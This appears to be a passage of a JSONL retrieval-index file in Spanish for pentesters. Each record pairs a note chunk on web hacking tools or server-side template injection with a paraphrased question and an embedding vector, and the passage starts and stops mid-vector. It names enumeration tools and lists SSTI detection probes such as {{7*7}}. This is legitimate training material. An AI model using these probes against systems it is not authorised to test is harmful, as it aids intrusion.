0.05105, 0.07646, 0.10227, 0.03633, -0.02242, 0.09291, -0.00466, 0.00174, 0.06156, 0.01603, -0.12479, -0.09055, 0.17719, -0.03428, -0.01705, -0.02876, 0.00716, -0.10833, -0.08341, 0.00275, -0.01574, -0.07185, -0.01334, -0.06574, -0.04647, -0.06436, -0.05625, -0.02133, -0.01208, -0.09317, 0.06703, -0.09112, -0.08973, 0.0486, 0.00196, 0.06655, 0.06977, -0.04389, 0.04302, -0.01096, -0.08846, -0.09394, -0.09879, -0.0428, 0.02572, 0.05722, -0.05157, -0.03567, 0.0137, -0.00096, -0.02418, 0.00511, -0.00635, 0.06001, -0.02516, 0.01469, -0.00788, -0.00276, -0.00146, 0.03786, -0.00392, 0.00779, 0.01774, -0.07299, -0.01261, 0.02605, -0.0353, -0.04712, -0.001, -0.04698, 0.02152, -0.01206, -0.01401, 0.01781, -0.04383, -0.00469, 0.01889, 0.0672, 0.04041, 0.03336, 0.02529, 0.01567, -0.093, -0.0474, -0.0356, -0.01685, -0.04034, 0.0564, -0.061, -0.02919, 0.02449, 0.07366, -0.01887, 0.03637, -0.0092, -0.01273, 0.0231, -0.00635, 0.01679, 0.07094, -0.01177, -0.02346, -0.04561, 0.09312, -0.03836, -0.01327, -0.06361, 0.04953, 0.00198, -0.02956, -0.00694, -0.02251, -0.03792, 0.01539, 0.02693, -0.03288, 0.02, 0.03928, 0.01699, 0.02915, -0.01, 0.05261, 0.03389, -0.05677, 0.02596, -0.00164, 0.03065, -0.01869, -0.01062, -0.01446, -0.02512, 0.03645, 0.01309, -0.06193, -0.00048, 0.03517, 0.07049, 0.07103, 0.05668, 0.00532, 0.01103, 0.01924, -0.02797, -0.03128, -0.00704, 0.01578, -0.05678, -0.01494, -0.10888, 0.04267, 0.06569, 0.03849, -0.05738, 0.00158, 0.02604, -0.03143, -0.03672, -0.01002, -0.01987, -0.05551, -0.00423, 0.03319, 0.01633, 0.08581, 0.01111]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "quΓ© herramientas sirven para hacer descubrimiento de contenido en servidores web?", "v": [0.09527, 0.00967, -0.13652, -0.16793, 0.04111, -0.12683, -0.01199, -0.12013, 0.07004, -0.09106, -0.13365, -0.01903, -0.02364, -0.07732, 0.08807, 0.09465, 0.18082, -0.09794, 0.07575, 0.02032, 0.02154, 0.04632, -0.06929, -0.02518, -0.13498, -0.04628, 0.03211, -0.03855, -0.10082, 0.14717, 0.02499, 0.03716, -0.02527, 0.07033, -0.11632, 0.02575, -0.03978, 0.09472, -0.08803, 0.04912, -0.00669, -0.04139, -0.08488, 0.0397, -0.08021, -0.01056, -0.00349, -0.08479, -0.0042, 0.03016, -0.07448, -0.09118, -0.0846, -0.05576, -0.0577, -0.06008, 0.09117, -0.0892, 0.04845, -0.00832, -0.19053, -0.02207, -0.07833, -0.00787, 0.0124, -0.09218, -0.05027, 0.03581, -0.02032, 0.04737, -0.02821, -0.05078, 0.05947, -0.06407, -0.00927, 0.04381, -0.06064, 0.03287, 0.04504, 0.05469, 0.02812, 0.08306, -0.02056, -0.00511, -0.09286, -0.09948, 0.0127, -0.04504, -0.00533, -0.14612, 0.03203, 0.15903, -0.09154, 0.12847, -0.01314, -0.00913, 0.15452, -0.10331, -0.00417, 0.06565, 0.08404, -0.02141, -0.00455, 0.01667, -0.03321, 0.13636, 0.04548, -0.00762, -0.02395, -0.08701, 0.06916, -0.043, -0.06308, -0.00478, -0.06698, 0.04082, 0.04346, -0.04802, -0.02673, -0.05108, -0.05947, 0.03631, 0.0069, 0.0432, -0.02057, -0.06151, 0.03227, 0.00066, 0.07278, -0.14247, 0.06895, -0.08668, -0.08562, 0.03893, 0.00785, -0.03917, 0.07105, -0.07452, -0.05572, -0.01358, 0.08669, -0.04792, -0.09919, -0.02722, 0.07819, -0.04205, 0.16327, 0.00817, -0.09154, -0.0302, -0.08092, -0.06486, -0.0779, -0.00611, -0.04342, -0.01973, -0.01668, -0.00443, -0.13587, -0.00403, 0.00235, 0.01606, -0.00602, 0.04226, 0.0033, -0.0098, -0.02549, 0.05218, 0.02145, 0.01393, 0.00728, 0.05012, 0.06378, -0.12749, 0.01876, -0.01982, -0.07279, -0.0003, 0.04526, -0.00976, 0.02901, 0.03808, -0.03243, 0.00626, -0.09339, -0.05489, 0.02764, -0.10326, -0.07138, 0.06197, -0.02108, -0.01917, -0.0283, 0.06548, 0.02187, -0.03106, -0.00664, -0.01318, 0.01446, -0.02554, 0.03635, -0.03448, -0.03476, -0.04175, -0.05474, -0.02893, -0.08785, -0.03146, -0.03009, 0.01814, 0.03265, -0.0121, 0.12358, -0.05894, -0.04175, -0.01253, 0.01068, -0.01539, -0.03522, -0.00637, 0.07477, -0.01921, 0.02278, -0.00833, 0.02757, 0.02532, 0.00559, 0.00265, 0.03502, -0.0217, -0.00235, -6e-05, -0.03261, -0.00447, -0.03566, -0.04765, 0.00265, -0.02617, -0.04991, -0.03953, -0.02852, 0.05612, 0.0194, -0.01251, 0.01348, -0.10566, 0.03284, -0.01524, -0.06106, -0.01196, -0.02256, -0.02836, 0.04938, -0.0138, 0.00246, -0.02]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "cual programa puedo usar para interceptar y manipular trΓ‘fico web completo?", "v": [0.06649, 0.06806, -0.16628, -0.22143, 0.04896, -0.05113, 0.03113, 0.04157, -0.09432, -0.02687, -0.05029, -0.11378, 0.02649, 0.02142, -0.03041, 0.03878, 0.01967, -0.08847, 0.08538, -0.07887, 0.04408, -0.0215, -0.00659, -0.17052, -0.05766, -0.02076, -0.11174, -0.02065, -0.15597, -0.09605, -0.07597, 0.00465, 0.15612, 0.00395, -0.0283, -0.06608, 0.02057, 0.03998, 0.07875, 0.00919, 0.04246, -0.05911, -0.15647, -0.05343, 0.12846, 0.02954, -0.03227, -0.09695, -0.10553, -0.09604, 0.03775, -0.01149, -0.15207, -0.0626, -0.01035, -0.08486, 0.10964, -0.15829, -0.01411, 0.02958, 0.04023, 0.08634, 0.01306, -0.00912, -0.00982, -0.0691, 0.01505, 0.02255, -0.12517, 0.02636, 0.05574, 0.13461, 0.09307, 0.12265, 0.11741, 0.00263, -0.04922, 0.01233, 0.08834, -0.00347, -0.01205, 0.01881, -0.05449, 0.10909, -0.0585, -0.00236, 0.04491, -0.14662, -0.00349, -0.0439, 0.01189, 0.0904, -0.0021, -0.05421, 0.10745, -0.05848, -0.03079, 0.03128, 0.03379, 0.00355, 0.15616, 0.00968, -0.13675, 0.06359, 0.02377, 0.05752, 0.00954, -0.0025, -0.02141, 0.02874, -0.11081, -0.0003, -0.06416, -0.04758, -0.05802, 0.0205, 0.0025, -0.0232, 0.01483, -0.15348, -0.10963, 0.05645, -0.08326, -0.0208, 0.12892, 0.01906, 0.05241, 0.11956, -0.02183, -0.03395, -0.03253, -0.01372, -0.06431, -0.09798, -0.00545, -0.10328, -0.01715, -0.0605, -0.01474, 0.0327, 0.03413, -0.02282, 0.0349, 0.03644, 0.0116, 0.02618, 0.01678, -0.05051, -0.035, -0.03863, 0.07214, -0.06857, -0.05245, 0.01134, 0.04835, -0.00598, 0.0222, -0.09169, -0.03649, -0.0006, -0.05647, 0.04656, -0.00598, 0.01108, 0.08773, -0.02623, -0.02605, 0.02298, 0.01586, -0.00551, 0.01465, 0.02979, 0.07815, -0.07675, -0.01064, -0.05658, -0.06627, 0.00539, 0.03062, -0.09125, -0.04505, 0.04123, 0.03838, 0.03327, -0.00204, 0.01632, -0.02987, 0.05715, -0.02271, 0.01266, -0.00661, 0.07789, -0.00517, -0.02578, -0.01243, 0.02097, 0.00675, 0.00558, 0.08025, -0.0433, 0.0419, -0.07593, 0.02988, -0.01342, -0.0233, 0.00807, 0.0113, -0.08239, 0.07716, 0.11373, 0.00765, -0.0309, 0.04193, -0.05248, -0.04187, -0.02263, 0.00404, 0.01056, 0.04061, 0.04658, -0.0167, 0.01889, -0.01782, 0.05804, -0.02245, -0.01184, -0.02063, 0.0438, 0.04108, 0.04781, -0.03361, -0.012, -0.01583, -0.01738, -0.02103, -0.00937, -0.01762, -0.03029, -0.0712, -0.08091, -0.00382, 0.04215, -0.01735, -0.06779, -0.01798, -0.03577, -0.0553, -0.0085, 0.00942, -0.04522, -0.02574, 0.06326, 0.01934, -0.08215, 0.0774, 0.01688]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "quΓ© alternativas libres existen para la enumeraciΓ³n de sitios web como nikto o whatweb?", "v": [-0.1143, 0.09598, -0.07184, 0.04428, -0.02765, -0.09341, -0.10273, -0.08634, -0.09999, -0.11922, -0.05415, -0.07515, -0.06845, -0.04619, 0.19356, 0.01387, 0.07947, -0.08041, 0.12938, -0.07574, -0.16027, -0.02924, -0.06427, -0.00508, -0.07555, -0.13485, 0.08284, -0.0168, -0.07445, 0.1102, 0.03788, -0.01211, 0.00928, 0.03517, -0.01582, 0.07367, 0.09341, 0.08267, -0.03475, -0.0227, 0.05211, -0.03641, -0.0444, 0.05329, -0.06814, -0.02194, -0.18034, -0.02593, 0.05383, 0.00064, -0.02754, 0.03515, -0.0928, -0.06646, 0.05249, -0.0332, 0.17235, -0.09745, 0.0424, 0.02499, -0.16053, 0.10988, 0.02743, 0.00686, 0.0152, 0.03654, -0.06483, 0.10499, -0.02364, 0.11379, 0.07856, -0.04458, 0.1473, -0.05181, 0.09981, -0.01343, -0.05218, 0.01743, -0.07675, 0.05979, 0.01936, -0.0491, -0.05396, 0.02601, -0.04738, -0.01532, 0.0069, -0.08317, -0.05828, -0.04452, 0.16137, 0.07255, -0.02002, 0.03752, -0.0632, -0.1232, 0.01497, 0.04757, 0.04311, 0.07456, -0.01692, -0.01623, -0.10839, 0.01607, 0.0189, 0.08569, 0.05484, -0.0052, -0.13017, -0.01842, 0.02811, -0.02162, -0.03243, -0.06767, -0.03922, -0.05535, 0.02259, -0.00364, 0.02247, -0.02986, -0.08412, 0.04186, -0.06229, -0.0307, -0.03899, 0.06635, 0.06861, 0.03802, -0.01411, -0.06395, 0.05531, -0.03193, -0.09227, -0.08942, -0.05304, -0.00433, 0.07583, -0.004, 0.09615, 0.01525, 0.02266, -0.02561, -0.07217, 0.00526, 0.01014, -0.07632, 0.00279, 0.00913, -0.12616, -0.04999, -0.0924, 0.01716, -0.04479, 0.0381, 0.00798, -0.00455, -0.10401, -0.01031, -0.04328, 0.0412, -0.00783, 0.01207, 0.02192, 0.02803, -0.01651, 0.04267, -0.0672, 0.04205, -0.0491, 0.01796, 0.02798, 0.10849, -0.00694, -0.15402, 0.02232, 0.01012, -0.10407, -0.01687, 0.02561, -0.04078, 0.03145, -0.06472, -0.06335, 0.05806, -0.06294, -0.03505, 0.06162, -0.0035, -0.04184, 0.05679, -0.02929, -0.02422, -0.0709, -0.05294, 0.06889, 0.07887, 0.00216, -0.04143, 0.05747, -0.01343, -0.08999, -0.0839, 0.02843, -0.01659, -0.05644, 0.05615, 0.00176, -0.02331, -0.00641, 0.02473, -0.04304, -0.01255, 0.01489, -0.08077, -0.01815, -0.0296, 0.08633, -0.02095, -0.08611, -0.0163, 0.09796, 0.00284, -0.04153, 0.01881, 0.0283, 0.0543, -0.00134, 0.02166, 0.02572, 0.02289, 0.005, -0.05559, -0.04412, 0.00413, -0.00662, -0.0262, -0.03497, 0.06004, -0.04389, 0.01832, -0.0021, 0.03234, -0.03765, -0.01262, 0.02947, -0.0729, -0.10427, -0.03051, -0.02121, 0.01815, -0.07287, -0.06282, -0.02572, 0.03, 0.00842, 0.01871]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "que es el SSTI y como funciona?", "v": [0.01804, -0.0079, -0.28261, 0.03927, 0.05066, -0.21816, -0.15246, -0.24583, 0.09113, 0.11372, -0.21929, -0.08307, 0.06318, -0.08885, 0.04682, -0.02928, -0.00984, -0.14655, -0.1645, 0.04148, -0.00727, -0.08198, 0.08742, -0.03044, -0.02306, 0.14626, 0.07154, 0.03076, -0.12556, 0.02507, 0.10609, -0.03329, 0.10692, -0.1933, 0.03416, -0.01574, -0.0803, -0.03857, 0.12278, 0.15818, 0.00834, -0.04877, 0.08115, -0.07713, -0.0181, 0.11148, 0.037, -0.0293, 0.01042, 0.10491, -0.06992, -0.00587, -0.08358, -0.01637, -0.12219, -0.01361, 0.04405, -0.12224, -0.02408, -0.00262, -0.03348, -0.02206, -0.14681, -0.0318, 0.05715, -0.08757, 0.11579, -0.06928, -0.0532, 0.03978, -0.03631, 0.07622, -0.06822, -0.02376, 0.0101, 0.08753, 0.04484, 0.01022, -0.03759, 0.04364, 0.05191, 0.02119, 0.0519, 0.02892, 0.02843, -0.02443, -0.03333, -0.09835, -0.05836, -0.01824, -0.1286, 0.04064, 0.07555, 0.11543, -0.01769, -0.0331, -0.05925, -0.02451, 0.06019, 0.00452, 0.06883, -0.03598, -0.00636, 0.08591, 0.01368, 0.00124, 0.11096, 0.0059, 0.0097, 0.00474, -0.07248, -0.06566, -0.12018, -0.02549, -0.07131, -0.05093, -0.07437, -0.07882, -0.01192, -0.00723, -0.09665, -0.01978, -0.01672, -0.0524, -0.00275, 0.02878, 0.05105, 0.03532, -0.00516, 0.0737, -0.03063, -0.00715, 0.01384, -0.01447, 0.05196, -0.09417, 0.00801, -0.06796, -0.00034, -0.03078, 0.03384, -0.00639, 0.02637, -0.02899, -0.02563, -0.06171, 0.02144, -0.05388, 0.00626, -0.03838, 0.05235, 0.01349, 0.03866, 0.03723, 0.00158, 0.00815, 0.01252, -0.00431, 0.00104, 0.05836, -0.04276, -0.06041, 0.03147, 0.01069, 0.0095, -0.00531, -0.0428, -0.07031, 0.03501, 0.02613, 0.03122, 0.03224, 0.05129, -0.05232, 0.00588, -0.03452, -0.01078, 0.01429, 0.08849, -0.02671, -0.04547, 0.04153, 0.04151, -0.01101, -0.02262, -0.02529, -0.02197, 0.00938, -0.06527, -0.00608, 0.02425, -0.01378, 0.02842, 0.0406, 0.01079, -0.01351, -0.01469, -0.02064, 0.03858, -0.02508, -0.02228, 0.01638, -0.04418, -0.01076, 0.01819, 0.003, -0.01514, 0.04661, 0.03544, -0.00217, 0.05113, -0.05618, -0.00469, 0.00889, -0.04775, 0.0133, -0.00613, -0.01211, -0.02239, 0.00085, 0.00375, -0.00111, -0.01731, 0.0285, -0.01004, 0.01316, -0.00122, 0.0588, 0.05007, 0.01615, 0.01295, -0.00867, 0.01515, 0.01432, 0.04911, 0.02636, -0.0254, -0.02524, -0.02882, 0.0151, -0.07909, -0.01924, 0.00846, -0.01022, 0.01694, -0.00221, -0.02794, -0.0694, -0.02431, -0.00849, -0.00334, -0.00388, 0.00844, 0.04322, 0.06268, 0.03716]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "cual es la diferencia entre las plantillas Jinja2 y Twig para vulnerabilidades?", "v": [0.00462, -0.10237, -0.09405, 0.00551, 0.18152, 0.01566, -0.07712, -0.03581, 0.08335, 0.02053, 0.25102, -0.00842, -0.0285, 0.08478, -0.00161, -0.05143, 0.01516, -0.25607, 0.12038, -0.06614, -0.09259, -0.08448, 0.02821, -0.10603, -0.07324, 0.01717, 0.0589, -0.00972, -0.11722, 0.04761, 0.07216, -0.04738, 0.10223, 0.0175, -0.01424, 0.20667, -0.02049, 0.08186, -0.0539, 0.02818, 0.02328, 0.03414, -0.02427, -0.02218, -0.01512, -0.0074, 0.00314, 0.05447, 0.03843, 0.06712, -0.1648, 0.11494, -0.03322, -0.09335, -0.01278, -0.09101, 0.24398, -0.0102, 0.02302, -0.06753, -0.07439, 0.05869, 0.00945, -0.00705, 0.10314, -0.12753, -0.0312, 0.00185, -0.07697, -0.00723, 0.01754, 0.014, -0.03092, -0.19733, 0.00635, 0.00571, 0.00322, 0.06451, -0.03132, 0.05524, 0.06334, 0.0076, 0.06316, 0.09261, -0.13667, -0.00441, 0.01744, 0.08229, 0.02389, -0.01751, 0.12902, 0.05929, -0.08165, 0.01555, -0.02469, -0.10521, 0.00164, 0.04684, 0.06916, -0.02246, -0.069, 0.08428, -0.00879, 0.05357, 0.03971, 0.0972, 0.03235, -0.01094, -0.0656, -0.06773, 0.05206, 0.07276, -0.04105, 0.01975, -0.02917, -0.0113, 0.02616, 0.0451, 0.05606, -0.01463, -0.02469, -0.10919, -0.05022, -0.00035, 0.05275, 0.04345, -0.00324, 0.03933, -0.06862, -0.04453, -0.0019, -0.04373, -0.05414, 0.05773, -0.01531, -0.00699, 0.06089, -0.05251, -0.02866, 0.0073, 0.08002, 0.01128, 0.08471, 0.0164, 0.07051, 0.06059, 0.01366, -0.02138, -0.14209, 0.07483, 0.01414, 0.01202, 0.03356, 0.02445, -0.03576, -0.10205, -0.08065, -0.05201, -0.01242, 0.08572, 0.02149, 0.03406, -0.03898, 0.01551, 0.0439, -0.04407, -0.01914, -0.03054, 0.06789, -0.04311, 0.02275, 0.0737, 0.01154, 0.01563, 0.024, -0.05898, 0.01258, -0.05906, 0.00768, 0.03521, -0.00738, -0.06232, -0.04541, -0.01271, 0.0539, -0.01522, -0.04755, -0.02531, -0.02399, 0.02961, -0.02914, -0.0062, 0.03163, -0.02193, 0.02863, -0.01988, 0.04427, -0.04859, -0.00563, 0.0162, -0.07966, -0.04832, -0.07609, 0.00529, 0.10315, 0.03126, -0.00511, -0.05896, 0.04171, 0.04689, 0.01684, -0.00505, 0.01925, -0.06877, -0.04818, -0.02463, -0.01914, 0.07253, 0.03893, -0.01045, -0.05155, -0.01279, 0.01441, -0.00672, -0.02968, 0.01748, -0.01683, -0.01962, -0.01474, 0.0408, -0.0086, 0.00042, -0.00566, -0.06022, 0.00924, 0.0758, 0.02919, -0.04188, 0.00541, -0.02523, 0.0039, 0.02542, 0.01654, -0.03097, 0.03158, -0.05281, -0.08045, -0.02044, -0.00642, -0.07134, -0.08302, 0.08006, 0.02713, -0.0344, -0.01594, -0.04972]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSTI (Server-Side Template Injection)\n\n> Tu input entra en una plantilla del servidor (Jinja2, Twig, Freemarker...) y se **evalΓΊa** β†’ RCE. Vector de Hacking web.", "indexar": "como puedo entender el vector de hacking web del Server-Side Template Injection?", "v": [0.06649, 0.03155, -0.12468, -0.14621, -0.05127, -0.1423, -0.04296, -0.02536, 0.16706, 0.05113, -0.09298, -0.0222, -0.01258, -0.08166, 0.06174, 0.16019, 0.16256, -0.20931, 0.09655, -0.03783, 0.05385, 0.0736, -0.04208, -0.00401, -0.02688, -0.02638, -0.02746, 0.09083, -0.09439, -0.10105, -0.03747, -0.10462, -0.03129, 0.08951, -0.15968, -0.00213, 0.00754, 0.14118, -0.03444, 0.04725, 0.02982, 0.04607, -0.17331, 0.0116, -0.0277, 0.0267, 0.03853, -0.08495, 0.10745, -0.01744, -0.02868, -0.07102, -0.2101, -0.02158, 0.05589, -0.00763, 0.1197, -0.10096, 0.06837, -0.08642, -0.03731, 0.07528, 0.03314, -0.06516, -0.04272, -0.0348, -0.00224, 0.06743, -0.05298, 0.05133, -0.02558, 0.04255, 0.01419, -0.09171, 0.08914, 0.02022, 0.04196, 0.069, 0.03964, 0.01138, -0.04592, 0.01348, -0.05068, 0.02308, -0.09023, 0.00791, 0.04168, -0.1123, 0.0434, -0.08507, 0.0854, 0.12708, 0.01385, -0.03884, -0.03937, -0.11232, 0.05541, -0.03586, 0.03208, -0.11603, -0.02974, 0.00708, -0.06059, 0.02694, 0.08153, 0.08391, 0.06274, -0.07316, 0.00385, -0.09214, 0.04464, 0.03481, -0.081, -0.02809, -0.0822, -0.08558, 0.01492, 0.12865, 0.0025, 0.00973, -0.0769, -0.04152, -8e-05, 0.07979, 0.02855, -0.02683, -0.07279, 0.07434, -0.00656, -0.08429, -0.00735, -0.09821, -0.06333, 0.04868, -0.05503, 0.05048, 0.00972, -0.09352, 0.00398, 0.01311, -0.01837, 0.05236, -0.0474, 0.05679, 0.01367, -0.01006, 0.10309, -0.01594, -0.04626, -0.08117, -0.00319, 0.04083, -0.02629, 0.01609, -0.11279, -0.01438, -0.04422, -0.12964, -0.04038, 0.06057, 0.04114, 0.02953, 0.02071, -0.02095, -0.04194, 0.10296, -0.0532, -0.01248, 0.01357, 0.03828, 0.0235, 0.05581, 0.00402, -0.0973, 0.02942, -0.03974, -0.05954, -0.03522, 0.03058, -0.04569, 0.02857, -0.01697, 0.01578, 0.05019, -0.06559, -0.03501, 0.0352, -0.00128, -0.02003, 0.01716, 0.01712, -0.03573, -0.07311, 0.09416, 0.04348, 0.00014, -0.03552, 0.02801, 0.09761, -0.05581, -0.05598, -0.05088, 0.0225, 0.00488, -0.01842, 0.03584, -0.00369, -0.05939, -0.04054, 0.02275, 0.05113, -0.02923, 0.01298, -0.05915, -0.03081, -0.01333, 0.04821, 0.01616, -0.01775, -0.00444, 0.03286, 0.06696, -0.01088, 0.01064, 0.01525, 0.02282, 0.02397, 0.02617, 0.01532, 0.02627, -0.01518, -0.00765, -0.05266, -0.03114, 0.00792, -0.00253, 0.01043, -0.01016, -0.06712, -0.01445, 0.01601, 0.00267, 0.01009, -0.09477, 0.00495, -0.1185, -0.04246, -0.01331, -0.02506, -0.01768, -0.06136, 0.00213, 0.00245, -0.00659, 0.01963, 0.02072]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "quΓ© herramienta sirve para detectar vulnerabilidades de inyecciΓ³n de plantillas en aplicaciones web", "v": [0.12563, 0.07269, -0.16535, -0.29485, 0.12738, -0.07804, -0.07494, -0.05386, 0.04615, 0.01296, 0.03073, -0.01509, -0.07765, -0.05582, 0.02636, 0.05998, 0.04357, -0.24121, 0.04775, -0.05944, -0.06855, -0.02986, -0.174, -0.06381, -0.14362, 0.08569, -0.0193, -0.01938, -0.11477, -0.01792, -0.06066, -0.04813, 0.07239, -0.00017, -0.16716, 0.00499, -0.10507, -0.01205, -0.01277, 0.05643, 0.03912, 0.0403, -0.0839, 0.02284, 0.04294, 0.03372, 0.00964, -0.05755, -0.00139, 0.06291, -0.05323, -0.06888, -0.10767, -0.05137, -0.02926, -0.09618, 0.19811, -0.10836, 0.08915, -0.10461, -0.15953, 0.05857, 0.0104, 0.01602, 0.02675, -0.07169, -0.02372, 0.0261, -0.09949, 0.02238, -0.00894, 0.00495, 0.04456, -0.00595, 0.03786, 0.02612, -0.0095, 0.04161, 0.00787, -0.00174, 0.02472, -0.01637, -0.04283, 0.04482, -0.10591, -0.02761, 0.09988, 0.0447, 0.09832, -0.1264, 0.10957, 0.07999, -0.08024, 0.01711, -0.01348, -0.05888, 0.11348, -0.04391, 0.02776, 0.02045, 0.01347, -0.08695, -0.04354, 0.01551, -0.0074, 0.06517, -0.03535, -0.05332, -0.04833, -0.08325, 0.03935, -0.0637, -0.00515, -0.03429, -0.01258, 0.08992, 0.07208, 0.00462, -0.01526, -0.06528, -0.04724, -0.03112, -0.05748, -0.04618, -0.00317, -0.00783, -0.02484, 0.04374, -0.06012, -0.05261, -0.00458, -0.08761, -0.11021, 0.06108, -0.05799, 0.03293, 0.03541, -0.10664, -0.04521, 0.00506, 0.02455, 0.05163, 6e-05, 0.01537, 0.04522, 0.05639, 0.01614, -0.02007, -0.03113, 0.00127, 0.0491, -0.04594, -0.01766, 0.03465, -0.07597, -0.0353, -0.03218, -0.03752, -0.07395, 0.05134, -0.03618, 0.03133, -0.02739, 0.06182, 0.00256, -0.04136, 0.05372, 0.02675, 0.12282, 0.10735, 0.05934, 0.07925, 0.0747, -0.06025, 0.03732, -0.02552, -0.0121, -0.0131, 0.02769, -0.09432, -0.03942, -0.06578, 0.0223, -0.01336, 0.04267, -0.02999, -0.01925, 0.01595, 0.02974, 0.0534, -0.00605, 0.00533, -0.00242, -0.01547, 0.09028, 0.03401, 0.01522, -0.03916, 0.00342, -0.03219, -0.06144, -0.03248, -0.05027, -0.02075, 0.06269, 0.08597, -0.01664, -0.03369, -0.00806, 0.0691, 0.00936, 0.03089, 0.0386, 0.00768, -0.01917, -0.0933, 0.01184, 0.05155, -0.01809, 0.00386, -0.0084, -0.05168, 0.03115, -0.02522, -0.01274, 0.01152, -0.02435, -0.0334, 0.02128, 0.01668, 0.04498, -0.04693, -0.04863, -0.00998, 0.00916, -0.07261, 0.01115, 0.01246, -0.06505, -0.03691, -0.0276, 0.02315, 0.02134, -0.02017, -0.01379, -0.05981, -0.00459, -0.05419, -0.00817, -0.06447, -0.06374, 0.06457, 0.09056, -0.04841, 0.01947, -0.01956]} -{"tipo": "pregunta", "herramienta": "SSTI", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SSTI.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n\n```\n{{7*7}} β†’ si responde 49 β†’ vulnerable (Jinja2/Twig)\n${7*7} β†’ Freemarker / otros\n<%= 7*7 %> β†’ ERB (Ruby)\n#{7*7} β†’ Ruby/otros\n```\nSi `{{7*7}}` devuelve `49` (no el literal), hay SSTI.", "indexar": "con quΓ© puedo comprobar si una app ejecuta cΓ³digo usando sintaxis Jinja2 o ERB", "v": [-0.13476, 0.00434, -0.16549, -0.01209, 0.20594, -0.14249, -0.04904, 0.04012, -0.08783, -0.09968, -0.09946, -0.08338, 0.00785, 0.02414, 0.08625, -0.02772, 0.04097, 0.03592, -0.06895, -0.05453, 0.04422, -0.04179, -0.02122, -0.07947, 0.04163, 0.12918, -0.07902, 0.11457, -0.06832, 0.01956, 0.01193, 0.03162, 0.19498, -0.00044, -0.08513, 0.11403, 0.03108, 0.05326, -0.03407, 0.10057, 0.05436, 0.08963, -0.10808, -0.07552, -0.06138, 0.06944, 0.08823, 0.03084, -0.04389, -0.0047, -0.09647, -0.03768, -0.16733, -0.01298, 0.02454, -0.15479, 0.07162, -0.14773, 0.02292, -0.05563, 0.12276, -0.06064, 0.00024, -0.03825, 0.05179, -0.07887, 0.10675, 0.05348, 0.00279, -0.00835, -0.04082, 0.12407, -0.10943, 0.00841, 0.09442, -0.06965, -0.03297, -0.07047, 0.10107, 0.09002, -0.02131, -0.00962, -0.1092, 0.0146, 0.01574, -0.05785, -0.06344, -0.07672, 0.00885, -0.12257, 0.10266, 0.02566, 0.06667, 0.04226, 0.09314, -0.0516, 0.04065, 0.05686, 0.04358, 0.05227, 0.15093, 0.01611, -0.05294, 0.07117, 0.00594, -0.00774, 0.10126, 0.01369, -0.02044, -0.05692, 0.02212, -0.07597, -0.15807, -0.04169, -0.08428, -0.0989, -0.0244, -0.02533, -0.07428, -0.06005, -0.04913, 0.00065, -0.02896, 0.00692, 0.03, 0.01488, 0.0031, 0.09772, 0.04219, -0.05248, -0.05155, -0.05223, 0.00654, 0.02644, -0.07534, 0.05232, 0.06395, 0.05084, -0.02093, -0.04672, 0.02023, 0.03114, 0.07337, 0.10419, 0.05675, 0.07339, -0.03645, -0.02604, -0.06596, 0.0273, 0.01979, -0.04431, -0.07304, 0.05181, -0.05032, -0.05845, 0.00104, -0.01194, -0.06156, -0.00251, -0.04264, 0.00402, -0.05049, 0.01975, 0.04606, -0.01137, 0.01372, -0.0639, 0.05735, 0.00543, -0.00352, 0.02361, 0.08945, -0.07491, 0.00849, -0.10877, -0.02543, -0.05057, 0.04339, 